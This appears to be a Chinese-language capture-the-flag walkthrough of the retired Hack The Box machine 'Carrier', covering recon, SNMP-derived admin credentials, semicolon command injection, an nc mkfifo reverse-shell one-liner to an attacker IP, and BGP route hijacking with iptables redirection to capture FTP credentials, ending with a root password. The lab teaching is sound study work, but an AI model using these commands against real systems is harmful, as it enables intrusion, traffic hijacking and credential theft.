本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.105
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.105 -o ./Carrier-autorecon
开放了21,22,80,还有udp端口161
看以下爆破的目录
访问一下目录看下
收集到上面的信息,可以得出登录remote.php页面的账户和密码,具体如下:
1.通过snmpwalk得出了目标设备的序列号 2.根据此页面的错误代码信息http://10.10.10.105/doc/error_codes.pdf,再通过登录界面显示的错误代码45007和45009 3.综合上面两条可以得出账户是admin,密码是序列号NET_45JDX23
使用上面的账户密码登录并点击里面的页面使用burpsuite进行抓包
burpsuite请求包
根据此请求包的相应显示猜测目标在接收上述POST请求之后,类似执行了查看进程的命令,ps aux | grep quagga 所以此处我们是可以通过分号来进行命令执行,测试的时候需要使用base64编码
下面是执行了以下命令ls -la
我们反弹shell
下面经过base64编码之后即可反弹shell
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 8844 >/tmp/f
成功反弹shell拿到了user.txt内容,看了下此shell的IP地址和arp信息,发现本机并非靶机10.10.10.105 我们还是需要继续探测
此shell靶机是Linux操作系统上通过软件quagga搭建的思科软路由操作系统,可以当作路由器来使用,这里所用到的知识点涉及到BGP路由劫持技术,详情请查看如下链接补充
https://www.cloudflare.com/zh-cn/learning/security/glossary/bgp-hijacking/ https://www.freebuf.com/articles/network/75305.html https://ti.qianxin.com/uploads/2018/08/27/8ae73e3c6734f0d2001d848cfb323d01.pdf
下面是配置BGP路由劫持,完成完成后就可以本地使用nc监听21端口获取ftp的账户和密码或者使用tcpdump都可以,此账户和密码同样可以使用ssh登录到目标靶机上
r1# conf t r1(config)# ip prefix-list leak permit 10.120.15.0/25 r1(config)# route-map to-as200 permit 10 r1(config-route-map)# match ip address prefix-list leak r1(config-route-map)# set community no-export r1(config-route-map)# route-map to-as200 permit 20 r1(config-route-map)# route-map to-as300 deny 10 r1(config-route-map)# match ip address prefix-list leak r1(config-route-map)# route-map to-as300 permit 20 r1(config-route-map)# router bgp 100 r1(config-router)# network 10.120.15.0 mask 255.255.255.128 r1(config-router)# end r1#
tcpdump -vv -s0 -ni eth2 -c 10 port 21 或者 nc -lvnp 21 也可以使用iptable将21端口使用nat技术转到本地kali的21端口然后nc监听 iptables -t nat -A PREROUTING -p tcp --dport 21 -j DNAT --to-destination 10.10.14.6:21 iptables -t nat -A POSTROUTING -j MASQUERADE
我这里测试监听21端口拿账户和密码有些问题,不知道啥原因,有测试成功的同学反馈下,最终的账户和密码是
root/BGPtelc0rout1ng